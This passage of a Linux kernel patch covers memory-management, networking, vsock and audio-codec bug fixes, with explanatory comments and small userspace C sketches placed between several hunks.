+-	mas_lock(&newmas);
++	down_write(&newmt_lock);
+ 	ret = mas_expected_entries(&newmas, nr_entries);
+ 	mt_set_non_kernel(0);
+ 	MT_BUG_ON(mt, ret != 0);
+@@ -2477,9 +2490,9 @@ static noinline void __init check_dup_gaps(struct maple_tree *mt,
+ 	}
+ 	rcu_read_unlock();
+ 	mas_destroy(&newmas);
+-	mas_unlock(&newmas);
+ 
+-	mtree_destroy(&newmt);
++	__mt_destroy(&newmt);
++	up_write(&newmt_lock);
+ }
+ 
+ /* Duplicate many sizes of trees.  Mainly to test expected entry values */
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index c38ec6efec0f7..aa4a68dfb3b92 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -96,6 +96,7 @@ static void hugetlb_vma_lock_alloc(struct vm_area_struct *vma);
+ static void __hugetlb_vma_unlock_write_free(struct vm_area_struct *vma);
+ static void hugetlb_unshare_pmds(struct vm_area_struct *vma,
+ 		unsigned long start, unsigned long end);
++static struct resv_map *vma_resv_map(struct vm_area_struct *vma);
+ 
+ static inline bool subpool_is_free(struct hugepage_subpool *spool)
+ {
+@@ -272,6 +273,10 @@ void hugetlb_vma_lock_read(struct vm_area_struct *vma)
+ 		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+ 		down_read(&vma_lock->rw_sema);
++	} else if (__vma_private_lock(vma)) {
++		struct resv_map *resv_map = vma_resv_map(vma);
++
++		down_read(&resv_map->rw_sema);
+ 	}
+ }
+ 
+@@ -281,6 +286,10 @@ void hugetlb_vma_unlock_read(struct vm_area_struct *vma)
+ 		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+ 		up_read(&vma_lock->rw_sema);
++	} else if (__vma_private_lock(vma)) {
++		struct resv_map *resv_map = vma_resv_map(vma);
++
++		up_read(&resv_map->rw_sema);
+ 	}
+ }
+ 
+@@ -290,6 +299,10 @@ void hugetlb_vma_lock_write(struct vm_area_struct *vma)
+ 		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+ 		down_write(&vma_lock->rw_sema);
++	} else if (__vma_private_lock(vma)) {
++		struct resv_map *resv_map = vma_resv_map(vma);
++
++		down_write(&resv_map->rw_sema);
+ 	}
+ }
+ 
+@@ -299,17 +312,27 @@ void hugetlb_vma_unlock_write(struct vm_area_struct *vma)
+ 		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+ 		up_write(&vma_lock->rw_sema);
++	} else if (__vma_private_lock(vma)) {
++		struct resv_map *resv_map = vma_resv_map(vma);
++
++		up_write(&resv_map->rw_sema);
+ 	}
+ }
+ 
+ int hugetlb_vma_trylock_write(struct vm_area_struct *vma)
+ {
+-	struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+-	if (!__vma_shareable_lock(vma))
+-		return 1;
++	if (__vma_shareable_lock(vma)) {
++		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+-	return down_write_trylock(&vma_lock->rw_sema);
++		return down_write_trylock(&vma_lock->rw_sema);
++	} else if (__vma_private_lock(vma)) {
++		struct resv_map *resv_map = vma_resv_map(vma);
++
++		return down_write_trylock(&resv_map->rw_sema);
++	}
++
++	return 1;
+ }
+ 
+ void hugetlb_vma_assert_locked(struct vm_area_struct *vma)
+@@ -318,6 +341,10 @@ void hugetlb_vma_assert_locked(struct vm_area_struct *vma)
+ 		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+ 		lockdep_assert_held(&vma_lock->rw_sema);
++	} else if (__vma_private_lock(vma)) {
++		struct resv_map *resv_map = vma_resv_map(vma);
++
++		lockdep_assert_held(&resv_map->rw_sema);
+ 	}
+ }
+ 
+@@ -350,6 +377,11 @@ static void __hugetlb_vma_unlock_write_free(struct vm_area_struct *vma)
+ 		struct hugetlb_vma_lock *vma_lock = vma->vm_private_data;
+ 
+ 		__hugetlb_vma_unlock_write_put(vma_lock);
++	} else if (__vma_private_lock(vma)) {
++		struct resv_map *resv_map = vma_resv_map(vma);
++
++		/* no free for anon vmas, but still need to unlock */
++		up_write(&resv_map->rw_sema);
+ 	}
+ }
+ 
+@@ -1068,6 +1100,7 @@ struct resv_map *resv_map_alloc(void)
+ 	kref_init(&resv_map->refs);
+ 	spin_lock_init(&resv_map->lock);
+ 	INIT_LIST_HEAD(&resv_map->regions);
++	init_rwsem(&resv_map->rw_sema);
+ 
+ 	resv_map->adds_in_progress = 0;
+ 	/*
+@@ -1138,8 +1171,7 @@ static void set_vma_resv_map(struct vm_area_struct *vma, struct resv_map *map)
+ 	VM_BUG_ON_VMA(!is_vm_hugetlb_page(vma), vma);
+ 	VM_BUG_ON_VMA(vma->vm_flags & VM_MAYSHARE, vma);
+ 
+-	set_vma_private_data(vma, (get_vma_private_data(vma) &
+-				HPAGE_RESV_MASK) | (unsigned long)map);
++	set_vma_private_data(vma, (unsigned long)map);
+ }
+ 
+ static void set_vma_resv_flags(struct vm_area_struct *vma, unsigned long flags)
+@@ -6898,8 +6930,10 @@ out_err:
+ 		 */
+ 		if (chg >= 0 && add < 0)
+ 			region_abort(resv_map, from, to, regions_needed);
+-	if (vma && is_vma_resv_set(vma, HPAGE_RESV_OWNER))
++	if (vma && is_vma_resv_set(vma, HPAGE_RESV_OWNER)) {
+ 		kref_put(&resv_map->refs, resv_map_release);
++		set_vma_resv_map(vma, NULL);
++	}
+ 	return false;
+ }
+ 
+diff --git a/mm/kasan/report.c b/mm/kasan/report.c
+index cc98dfdd3ed2f..66a37f177d231 100644
+--- a/mm/kasan/report.c
++++ b/mm/kasan/report.c
+@@ -523,9 +523,8 @@ void kasan_report_async(void)
+ }
+ #endif /* CONFIG_KASAN_HW_TAGS */
+ 
+-#ifdef CONFIG_KASAN_INLINE
+ /*
+- * With CONFIG_KASAN_INLINE, accesses to bogus pointers (outside the high
++ * With CONFIG_KASAN, accesses to bogus pointers (outside the high
+  * canonical half of the address space) cause out-of-bounds shadow memory reads
+  * before the actual access. For addresses in the low canonical half of the
+  * address space, as well as most non-canonical addresses, that out-of-bounds
+@@ -561,4 +560,3 @@ void kasan_non_canonical_hook(unsigned long addr)
+ 	pr_alert("KASAN: %s in range [0x%016lx-0x%016lx]\n", bug_type,
+ 		 orig_addr, orig_addr + KASAN_GRANULE_SIZE - 1);
+ }
+-#endif
+diff --git a/mm/migrate.c b/mm/migrate.c
+index 8d5c0dc618a57..9372a826e6d08 100644
+--- a/mm/migrate.c
++++ b/mm/migrate.c
+@@ -1787,6 +1787,7 @@ static int do_pages_move(struct mm_struct *mm, nodemask_t task_nodes,
+ 			 const int __user *nodes,
+ 			 int __user *status, int flags)
+ {
++	compat_uptr_t __user *compat_pages = (void __user *)pages;
+ 	int current_node = NUMA_NO_NODE;
+ 	LIST_HEAD(pagelist);
+ 	int start, i;
+@@ -1800,8 +1801,17 @@ static int do_pages_move(struct mm_struct *mm, nodemask_t task_nodes,
+ 		int node;
+ 
+ 		err = -EFAULT;
+-		if (get_user(p, pages + i))
+-			goto out_flush;
++		if (in_compat_syscall()) {
++			compat_uptr_t cp;
++
++			if (get_user(cp, compat_pages + i))
++				goto out_flush;
++
++			p = compat_ptr(cp);
++		} else {
++			if (get_user(p, pages + i))
++				goto out_flush;
++		}
+ 		if (get_user(node, nodes + i))
+ 			goto out_flush;
+ 		addr = (unsigned long)untagged_addr(p);
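
The mm/migrate.c hunk fixes move_pages() for 32-bit callers: their pages array holds 4-byte pointers, so a 64-bit kernel must fetch compat_uptr_t-sized entries and widen them rather than read 8 bytes per slot. A minimal userspace sketch of that widening, with hypothetical helper names (build with any C99 compiler):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* read_entry() models the in_compat_syscall() branch: compat callers
 * store 32-bit pointers, native callers store full-width ones. */
static void *read_entry(const void *array, size_t i, int compat)
{
	if (compat) {
		uint32_t cp;	/* like compat_uptr_t */

		memcpy(&cp, (const uint32_t *)array + i, sizeof(cp));
		return (void *)(uintptr_t)cp;	/* like compat_ptr(cp) */
	} else {
		void *p;

		memcpy(&p, (void * const *)array + i, sizeof(p));
		return p;
	}
}

int main(void)
{
	uint32_t compat_pages[2] = { 0x1000, 0x2000 };

	for (size_t i = 0; i < 2; i++)
		printf("entry %zu: %p\n", i, read_entry(compat_pages, i, 1));
	return 0;
}
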
+diff --git a/mm/mmap.c b/mm/mmap.c
+index 41a240bd81df8..8ffe3f87f7ba9 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -3147,13 +3147,13 @@ int vm_brk_flags(unsigned long addr, unsigned long request, unsigned long flags)
+ 	if (!len)
+ 		return 0;
+ 
+-	if (mmap_write_lock_killable(mm))
+-		return -EINTR;
+-
+ 	/* Until we need other flags, refuse anything except VM_EXEC. */
+ 	if ((flags & (~VM_EXEC)) != 0)
+ 		return -EINVAL;
+ 
++	if (mmap_write_lock_killable(mm))
++		return -EINTR;
++
+ 	ret = check_brk_limits(addr, len);
+ 	if (ret)
+ 		goto limits_failed;
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index ca017c6008b7c..4583f8a42d914 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -9638,6 +9638,7 @@ static void break_down_buddy_pages(struct zone *zone, struct page *page,
+ 			next_page = page;
+ 			current_buddy = page + size;
+ 		}
++		page = next_page;
+ 
+ 		if (set_page_guard(zone, current_buddy, high, migratetype))
+ 			continue;
+@@ -9645,7 +9646,6 @@ static void break_down_buddy_pages(struct zone *zone, struct page *page,
+ 		if (current_buddy != target) {
+ 			add_to_free_list(current_buddy, zone, high, migratetype);
+ 			set_buddy_order(current_buddy, high);
+-			page = next_page;
+ 		}
+ 	}
+ }
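
The mm/page_alloc.c fix moves page = next_page out of the guard-page condition so the walk always descends into the half that contains the target page. A toy of the corrected split loop, using plain page numbers instead of struct page and assuming the target lies inside the block:

#include <stdio.h>

/* Toy of the corrected split walk: at each step, free the half that
 * does not contain `target` and always advance `page` into the half
 * that does (the bug left `page` behind when a guard page was set). */
static void break_down(unsigned long page, unsigned long target,
		       unsigned int high)
{
	unsigned long size = 1UL << high;

	while (high > 0) {
		unsigned long half = size >> 1;
		unsigned long freed;

		high--;
		size = half;
		if (target >= page + half) {
			freed = page;		/* lower half goes back */
			page += half;		/* descend into upper half */
		} else {
			freed = page + half;	/* upper half goes back */
		}
		printf("free order-%u block at %lu, keep half at %lu\n",
		       high, freed, page);
	}
}

int main(void)
{
	break_down(0, 5, 3);	/* split pages 0..7 around target page 5 */
	return 0;
}
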
+diff --git a/net/core/neighbour.c b/net/core/neighbour.c
+index b20c9768d9f3f..41daa47d03934 100644
+--- a/net/core/neighbour.c
++++ b/net/core/neighbour.c
+@@ -251,7 +251,8 @@ bool neigh_remove_one(struct neighbour *ndel, struct neigh_table *tbl)
+ 
+ static int neigh_forced_gc(struct neigh_table *tbl)
+ {
+-	int max_clean = atomic_read(&tbl->gc_entries) - tbl->gc_thresh2;
++	int max_clean = atomic_read(&tbl->gc_entries) -
++			READ_ONCE(tbl->gc_thresh2);
+ 	unsigned long tref = jiffies - 5 * HZ;
+ 	struct neighbour *n, *tmp;
+ 	int shrunk = 0;
+@@ -280,7 +281,7 @@ static int neigh_forced_gc(struct neigh_table *tbl)
+ 		}
+ 	}
+ 
+-	tbl->last_flush = jiffies;
++	WRITE_ONCE(tbl->last_flush, jiffies);
+ 
+ 	write_unlock_bh(&tbl->lock);
+ 
+@@ -464,17 +465,17 @@ static struct neighbour *neigh_alloc(struct neigh_table *tbl,
+ {
+ 	struct neighbour *n = NULL;
+ 	unsigned long now = jiffies;
+-	int entries;
++	int entries, gc_thresh3;
+ 
+ 	if (exempt_from_gc)
+ 		goto do_alloc;
+ 
+ 	entries = atomic_inc_return(&tbl->gc_entries) - 1;
+-	if (entries >= tbl->gc_thresh3 ||
+-	    (entries >= tbl->gc_thresh2 &&
+-	     time_after(now, tbl->last_flush + 5 * HZ))) {
+-		if (!neigh_forced_gc(tbl) &&
+-		    entries >= tbl->gc_thresh3) {
++	gc_thresh3 = READ_ONCE(tbl->gc_thresh3);
++	if (entries >= gc_thresh3 ||
++	    (entries >= READ_ONCE(tbl->gc_thresh2) &&
++	     time_after(now, READ_ONCE(tbl->last_flush) + 5 * HZ))) {
++		if (!neigh_forced_gc(tbl) && entries >= gc_thresh3) {
+ 			net_info_ratelimited("%s: neighbor table overflow!\n",
+ 					     tbl->id);
+ 			NEIGH_CACHE_STAT_INC(tbl, table_fulls);
+@@ -955,13 +956,14 @@ static void neigh_periodic_work(struct work_struct *work)
+ 
+ 	if (time_after(jiffies, tbl->last_rand + 300 * HZ)) {
+ 		struct neigh_parms *p;
+-		tbl->last_rand = jiffies;
++
++		WRITE_ONCE(tbl->last_rand, jiffies);
+ 		list_for_each_entry(p, &tbl->parms_list, list)
+ 			p->reachable_time =
+ 				neigh_rand_reach_time(NEIGH_VAR(p, BASE_REACHABLE_TIME));
+ 	}
+ 
+-	if (atomic_read(&tbl->entries) < tbl->gc_thresh1)
++	if (atomic_read(&tbl->entries) < READ_ONCE(tbl->gc_thresh1))
+ 		goto out;
+ 
+ 	for (i = 0 ; i < (1 << nht->hash_shift); i++) {
+@@ -2157,15 +2159,16 @@ static int neightbl_fill_info(struct sk_buff *skb, struct neigh_table *tbl,
+ 	ndtmsg->ndtm_pad2   = 0;
+ 
+ 	if (nla_put_string(skb, NDTA_NAME, tbl->id) ||
+-	    nla_put_msecs(skb, NDTA_GC_INTERVAL, tbl->gc_interval, NDTA_PAD) ||
+-	    nla_put_u32(skb, NDTA_THRESH1, tbl->gc_thresh1) ||
+-	    nla_put_u32(skb, NDTA_THRESH2, tbl->gc_thresh2) ||
+-	    nla_put_u32(skb, NDTA_THRESH3, tbl->gc_thresh3))
++	    nla_put_msecs(skb, NDTA_GC_INTERVAL, READ_ONCE(tbl->gc_interval),
++			  NDTA_PAD) ||
++	    nla_put_u32(skb, NDTA_THRESH1, READ_ONCE(tbl->gc_thresh1)) ||
++	    nla_put_u32(skb, NDTA_THRESH2, READ_ONCE(tbl->gc_thresh2)) ||
++	    nla_put_u32(skb, NDTA_THRESH3, READ_ONCE(tbl->gc_thresh3)))
+ 		goto nla_put_failure;
+ 	{
+ 		unsigned long now = jiffies;
+-		long flush_delta = now - tbl->last_flush;
+-		long rand_delta = now - tbl->last_rand;
++		long flush_delta = now - READ_ONCE(tbl->last_flush);
++		long rand_delta = now - READ_ONCE(tbl->last_rand);
+ 		struct neigh_hash_table *nht;
+ 		struct ndt_config ndc = {
+ 			.ndtc_key_len		= tbl->key_len,
+@@ -2173,7 +2176,7 @@ static int neightbl_fill_info(struct sk_buff *skb, struct neigh_table *tbl,
+ 			.ndtc_entries		= atomic_read(&tbl->entries),
+ 			.ndtc_last_flush	= jiffies_to_msecs(flush_delta),
+ 			.ndtc_last_rand		= jiffies_to_msecs(rand_delta),
+-			.ndtc_proxy_qlen	= tbl->proxy_queue.qlen,
++			.ndtc_proxy_qlen	= READ_ONCE(tbl->proxy_queue.qlen),
+ 		};
+ 
+ 		rcu_read_lock();
+@@ -2196,17 +2199,17 @@ static int neightbl_fill_info(struct sk_buff *skb, struct neigh_table *tbl,
+ 			struct neigh_statistics	*st;
+ 
+ 			st = per_cpu_ptr(tbl->stats, cpu);
+-			ndst.ndts_allocs		+= st->allocs;
+-			ndst.ndts_destroys		+= st->destroys;
+-			ndst.ndts_hash_grows		+= st->hash_grows;
+-			ndst.ndts_res_failed		+= st->res_failed;
+-			ndst.ndts_lookups		+= st->lookups;
+-			ndst.ndts_hits			+= st->hits;
+-			ndst.ndts_rcv_probes_mcast	+= st->rcv_probes_mcast;
+-			ndst.ndts_rcv_probes_ucast	+= st->rcv_probes_ucast;
+-			ndst.ndts_periodic_gc_runs	+= st->periodic_gc_runs;
+-			ndst.ndts_forced_gc_runs	+= st->forced_gc_runs;
+-			ndst.ndts_table_fulls		+= st->table_fulls;
++			ndst.ndts_allocs		+= READ_ONCE(st->allocs);
++			ndst.ndts_destroys		+= READ_ONCE(st->destroys);
++			ndst.ndts_hash_grows		+= READ_ONCE(st->hash_grows);
++			ndst.ndts_res_failed		+= READ_ONCE(st->res_failed);
++			ndst.ndts_lookups		+= READ_ONCE(st->lookups);
++			ndst.ndts_hits			+= READ_ONCE(st->hits);
++			ndst.ndts_rcv_probes_mcast	+= READ_ONCE(st->rcv_probes_mcast);
++			ndst.ndts_rcv_probes_ucast	+= READ_ONCE(st->rcv_probes_ucast);
++			ndst.ndts_periodic_gc_runs	+= READ_ONCE(st->periodic_gc_runs);
++			ndst.ndts_forced_gc_runs	+= READ_ONCE(st->forced_gc_runs);
++			ndst.ndts_table_fulls		+= READ_ONCE(st->table_fulls);
+ 		}
+ 
+ 		if (nla_put_64bit(skb, NDTA_STATS, sizeof(ndst), &ndst,
+@@ -2435,16 +2438,16 @@ static int neightbl_set(struct sk_buff *skb, struct nlmsghdr *nlh,
+ 		goto errout_tbl_lock;
+ 
+ 	if (tb[NDTA_THRESH1])
+-		tbl->gc_thresh1 = nla_get_u32(tb[NDTA_THRESH1]);
++		WRITE_ONCE(tbl->gc_thresh1, nla_get_u32(tb[NDTA_THRESH1]));
+ 
+ 	if (tb[NDTA_THRESH2])
+-		tbl->gc_thresh2 = nla_get_u32(tb[NDTA_THRESH2]);
++		WRITE_ONCE(tbl->gc_thresh2, nla_get_u32(tb[NDTA_THRESH2]));
+ 
+ 	if (tb[NDTA_THRESH3])
+-		tbl->gc_thresh3 = nla_get_u32(tb[NDTA_THRESH3]);
++		WRITE_ONCE(tbl->gc_thresh3, nla_get_u32(tb[NDTA_THRESH3]));
+ 
+ 	if (tb[NDTA_GC_INTERVAL])
+-		tbl->gc_interval = nla_get_msecs(tb[NDTA_GC_INTERVAL]);
++		WRITE_ONCE(tbl->gc_interval, nla_get_msecs(tb[NDTA_GC_INTERVAL]));
+ 
+ 	err = 0;
+ 
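
The net/core/neighbour.c hunks annotate fields that are written under the table lock but sampled locklessly (gc thresholds, timestamps, per-CPU stats) with READ_ONCE()/WRITE_ONCE(). A standalone sketch of the pattern, using the usual volatile-cast definitions (GCC/Clang, link with -pthread):

#include <pthread.h>
#include <stdio.h>

#define READ_ONCE(x)	 (*(const volatile __typeof__(x) *)&(x))
#define WRITE_ONCE(x, v) (*(volatile __typeof__(x) *)&(x) = (v))

static int gc_thresh2 = 512;
static pthread_mutex_t table_lock = PTHREAD_MUTEX_INITIALIZER;

static void set_thresh(int v)		/* writer path, lock held */
{
	pthread_mutex_lock(&table_lock);
	WRITE_ONCE(gc_thresh2, v);
	pthread_mutex_unlock(&table_lock);
}

static int over_thresh(int entries)	/* lockless reader path */
{
	return entries >= READ_ONCE(gc_thresh2);
}

int main(void)
{
	set_thresh(1024);
	printf("over: %d\n", over_thresh(2048));
	return 0;
}
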
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 068221e742425..d63942202493d 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -2202,16 +2202,17 @@ void tcp_enter_loss(struct sock *sk)
+  * restore sanity to the SACK scoreboard. If the apparent reneging
+  * persists until this RTO then we'll clear the SACK scoreboard.
+  */
+-static bool tcp_check_sack_reneging(struct sock *sk, int flag)
++static bool tcp_check_sack_reneging(struct sock *sk, int *ack_flag)
+ {
+-	if (flag & FLAG_SACK_RENEGING &&
+-	    flag & FLAG_SND_UNA_ADVANCED) {
++	if (*ack_flag & FLAG_SACK_RENEGING &&
++	    *ack_flag & FLAG_SND_UNA_ADVANCED) {
+ 		struct tcp_sock *tp = tcp_sk(sk);
+ 		unsigned long delay = max(usecs_to_jiffies(tp->srtt_us >> 4),
+ 					  msecs_to_jiffies(10));
+ 
+ 		inet_csk_reset_xmit_timer(sk, ICSK_TIME_RETRANS,
+ 					  delay, TCP_RTO_MAX);
++		*ack_flag &= ~FLAG_SET_XMIT_TIMER;
+ 		return true;
+ 	}
+ 	return false;
+@@ -2981,7 +2982,7 @@ static void tcp_fastretrans_alert(struct sock *sk, const u32 prior_snd_una,
+ 		tp->prior_ssthresh = 0;
+ 
+ 	/* B. In all the states check for reneging SACKs. */
+-	if (tcp_check_sack_reneging(sk, flag))
++	if (tcp_check_sack_reneging(sk, ack_flag))
+ 		return;
+ 
+ 	/* C. Check consistency of the current state. */
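
The tcp_input.c change passes the ack flags by pointer so tcp_check_sack_reneging() can clear FLAG_SET_XMIT_TIMER after arming its own, longer retransmit timer, preventing the caller from immediately re-arming a shorter one. A toy model of that out-parameter flag clearing; the flag values here are invented, not the kernel's:

#include <stdio.h>

#define FLAG_SACK_RENEGING	0x01	/* hypothetical values */
#define FLAG_SND_UNA_ADVANCED	0x02
#define FLAG_SET_XMIT_TIMER	0x04

static int check_sack_reneging(int *ack_flag)
{
	if ((*ack_flag & FLAG_SACK_RENEGING) &&
	    (*ack_flag & FLAG_SND_UNA_ADVANCED)) {
		/* ... arm the reneging timer here ... */
		*ack_flag &= ~FLAG_SET_XMIT_TIMER;	/* caller must not re-arm */
		return 1;
	}
	return 0;
}

int main(void)
{
	int flag = FLAG_SACK_RENEGING | FLAG_SND_UNA_ADVANCED |
		   FLAG_SET_XMIT_TIMER;

	check_sack_reneging(&flag);
	printf("FLAG_SET_XMIT_TIMER still set: %d\n",
	       !!(flag & FLAG_SET_XMIT_TIMER));
	return 0;
}
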
+diff --git a/net/vmw_vsock/virtio_transport.c b/net/vmw_vsock/virtio_transport.c
+index ad64f403536a9..460e7fbb42da3 100644
+--- a/net/vmw_vsock/virtio_transport.c
++++ b/net/vmw_vsock/virtio_transport.c
+@@ -590,6 +590,11 @@ static int virtio_vsock_vqs_init(struct virtio_vsock *vsock)
+ 
+ 	virtio_device_ready(vdev);
+ 
++	return 0;
++}
++
++static void virtio_vsock_vqs_start(struct virtio_vsock *vsock)
++{
+ 	mutex_lock(&vsock->tx_lock);
+ 	vsock->tx_run = true;
+ 	mutex_unlock(&vsock->tx_lock);
+@@ -604,7 +609,16 @@ static int virtio_vsock_vqs_init(struct virtio_vsock *vsock)
+ 	vsock->event_run = true;
+ 	mutex_unlock(&vsock->event_lock);
+ 
+-	return 0;
++	/* virtio_transport_send_pkt() can queue packets once
++	 * the_virtio_vsock is set, but they won't be processed until
++	 * vsock->tx_run is set to true. We queue vsock->send_pkt_work
++	 * when initialization finishes to send those packets queued
++	 * earlier.
++	 * We don't need to queue the other workers (rx, event) because
++	 * as long as we don't fill the queues with empty buffers, the
++	 * host can't send us any notification.
++	 */
++	queue_work(virtio_vsock_workqueue, &vsock->send_pkt_work);
+ }
+ 
+ static void virtio_vsock_vqs_del(struct virtio_vsock *vsock)
+@@ -707,6 +721,7 @@ static int virtio_vsock_probe(struct virtio_device *vdev)
+ 		goto out;
+ 
+ 	rcu_assign_pointer(the_virtio_vsock, vsock);
++	virtio_vsock_vqs_start(vsock);
+ 
+ 	mutex_unlock(&the_virtio_vsock_mutex);
+ 
+@@ -779,6 +794,7 @@ static int virtio_vsock_restore(struct virtio_device *vdev)
+ 		goto out;
+ 
+ 	rcu_assign_pointer(the_virtio_vsock, vsock);
++	virtio_vsock_vqs_start(vsock);
+ 
+ out:
+ 	mutex_unlock(&the_virtio_vsock_mutex);
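
The vsock change splits vq setup from starting the workers: packets can be queued as soon as the_virtio_vsock is published, but nothing is processed until tx_run is set, so the start path kicks the TX worker once to drain that window. A single-threaded toy of the same ordering (made-up names, no real virtio involved):

#include <stdbool.h>
#include <stdio.h>

struct dev {
	bool tx_run;
	int queued;
};

static struct dev *the_dev;

static void send_pkt(void)
{
	if (the_dev)
		the_dev->queued++;	/* queued, not yet processed */
}

static void tx_work(struct dev *d)
{
	if (!d->tx_run)
		return;
	printf("processed %d packet(s)\n", d->queued);
	d->queued = 0;
}

static void start(struct dev *d)
{
	d->tx_run = true;
	tx_work(d);	/* like queue_work(): drain early packets */
}

int main(void)
{
	static struct dev d;

	the_dev = &d;	/* publish: senders can queue from here on */
	send_pkt();	/* lands in the queue before tx_run is set */
	start(&d);
	return 0;
}
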
+diff --git a/sound/soc/codecs/wcd938x.c b/sound/soc/codecs/wcd938x.c
+index c3964aa00b288..a2abd1a111612 100644
+--- a/sound/soc/codecs/wcd938x.c
++++ b/sound/soc/codecs/wcd938x.c
+@@ -3302,18 +3302,15 @@ static int wcd938x_populate_dt_data(struct wcd938x_priv *wcd938x, struct device
+ 	int ret;
+ 
+ 	wcd938x->reset_gpio = of_get_named_gpio(dev->of_node, "reset-gpios", 0);
+-	if (wcd938x->reset_gpio < 0) {
+-		dev_err(dev, "Failed to get reset gpio: err = %d\n",
+-			wcd938x->reset_gpio);
+-		return wcd938x->reset_gpio;
+-	}
++	if (wcd938x->reset_gpio < 0)
++		return dev_err_probe(dev, wcd938x->reset_gpio,
++				     "Failed to get reset gpio\n");
+ 
+ 	wcd938x->us_euro_gpio = devm_gpiod_get_optional(dev, "us-euro",
+ 						GPIOD_OUT_LOW);
+-	if (IS_ERR(wcd938x->us_euro_gpio)) {
+-		dev_err(dev, "us-euro swap Control GPIO not found\n");
+-		return PTR_ERR(wcd938x->us_euro_gpio);
+-	}
++	if (IS_ERR(wcd938x->us_euro_gpio))
++		return dev_err_probe(dev, PTR_ERR(wcd938x->us_euro_gpio),
++				     "us-euro swap Control GPIO not found\n");
+ 
+ 	cfg->swap_gnd_mic = wcd938x_swap_gnd_mic;
+ 
+@@ -3323,15 +3320,13 @@ static int wcd938x_populate_dt_data(struct wcd938x_priv *wcd938x, struct device
+ 	wcd938x->supplies[3].supply = "vdd-mic-bias";
+ 
+ 	ret = regulator_bulk_get(dev, WCD938X_MAX_SUPPLY, wcd938x->supplies);
+-	if (ret) {
+-		dev_err(dev, "Failed to get supplies: err = %d\n", ret);
+-		return ret;
+-	}
++	if (ret)
++		return dev_err_probe(dev, ret, "Failed to get supplies\n");
+ 
+ 	ret = regulator_bulk_enable(WCD938X_MAX_SUPPLY, wcd938x->supplies);
+ 	if (ret) {
+-		dev_err(dev, "Failed to enable supplies: err = %d\n", ret);
+-		return ret;
++		regulator_bulk_free(WCD938X_MAX_SUPPLY, wcd938x->supplies);
++		return dev_err_probe(dev, ret, "Failed to enable supplies\n");
+ 	}
+ 
+ 	wcd938x_dt_parse_micbias_info(dev, wcd938x);
+@@ -3598,13 +3593,13 @@ static int wcd938x_probe(struct platform_device *pdev)
+ 
+ 	ret = wcd938x_add_slave_components(wcd938x, dev, &match);
+ 	if (ret)
+-		return ret;
++		goto err_disable_regulators;
+ 
+ 	wcd938x_reset(wcd938x);
+ 
+ 	ret = component_master_add_with_match(dev, &wcd938x_comp_ops, match);
+ 	if (ret)
+-		return ret;
++		goto err_disable_regulators;
+ 
+ 	pm_runtime_set_autosuspend_delay(dev, 1000);
+ 	pm_runtime_use_autosuspend(dev);
+@@ -3614,13 +3609,27 @@ static int wcd938x_probe(struct platform_device *pdev)
+ 	pm_runtime_idle(dev);
+ 
+ 	return 0;
++
++err_disable_regulators:
++	regulator_bulk_disable(WCD938X_MAX_SUPPLY, wcd938x->supplies);
++	regulator_bulk_free(WCD938X_MAX_SUPPLY, wcd938x->supplies);
++
++	return ret;
+ }
+ 
+-static int wcd938x_remove(struct platform_device *pdev)
++static void wcd938x_remove(struct platform_device *pdev)
+ {
+-	component_master_del(&pdev->dev, &wcd938x_comp_ops);
++	struct device *dev = &pdev->dev;
++	struct wcd938x_priv *wcd938x = dev_get_drvdata(dev);
+ 
+-	return 0;
++	component_master_del(dev, &wcd938x_comp_ops);
++
++	pm_runtime_disable(dev);
++	pm_runtime_set_suspended(dev);
++	pm_runtime_dont_use_autosuspend(dev);
++
++	regulator_bulk_disable(WCD938X_MAX_SUPPLY, wcd938x->supplies);
++	regulator_bulk_free(WCD938X_MAX_SUPPLY, wcd938x->supplies);
+ }
+ 
+ #if defined(CONFIG_OF)
+@@ -3634,7 +3643,7 @@ MODULE_DEVICE_TABLE(of, wcd938x_dt_match);
+ 
+ static struct platform_driver wcd938x_codec_driver = {
+ 	.probe = wcd938x_probe,
+-	.remove = wcd938x_remove,
++	.remove_new = wcd938x_remove,
+ 	.driver = {
+ 		.name = "wcd938x_codec",
+ 		.of_match_table = of_match_ptr(wcd938x_dt_match),
+diff --git a/tools/include/linux/rwsem.h b/tools/include/linux/rwsem.h
+new file mode 100644
+index 0000000000000..83971b3cbfced
+--- /dev/null
++++ b/tools/include/linux/rwsem.h
+@@ -0,0 +1,40 @@
++/* SPDX-License-Identifier: GPL-2.0+ */
++#ifndef _TOOLS__RWSEM_H
++#define _TOOLS__RWSEM_H
++
++#include <pthread.h>
++
++struct rw_semaphore {
++	pthread_rwlock_t lock;
++};
++
++static inline int init_rwsem(struct rw_semaphore *sem)
++{
++	return pthread_rwlock_init(&sem->lock, NULL);
++}
++
++static inline int exit_rwsem(struct rw_semaphore *sem)
++{
++	return pthread_rwlock_destroy(&sem->lock);
++}
++
++static inline int down_read(struct rw_semaphore *sem)
++{
++	return pthread_rwlock_rdlock(&sem->lock);
++}
++
++static inline int up_read(struct rw_semaphore *sem)
++{
++	return pthread_rwlock_unlock(&sem->lock);
++}
++
++static inline int down_write(struct rw_semaphore *sem)
++{
++	return pthread_rwlock_wrlock(&sem->lock);
++}
++
++static inline int up_write(struct rw_semaphore *sem)
++{
++	return pthread_rwlock_unlock(&sem->lock);
++}
++#endif /* _TOOLS__RWSEM_H */
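
For anyone using the new tools/include shim, the mapping is direct: down_read()/up_read() and down_write()/up_write() become pthread rwlock operations. A standalone demo with the shim's read-side functions inlined so it builds on its own; in a real tools/ build you would include the header instead (link with -pthread):

#include <pthread.h>
#include <stdio.h>

/* Inlined copy of the shim above, for a self-contained demo. */
struct rw_semaphore { pthread_rwlock_t lock; };

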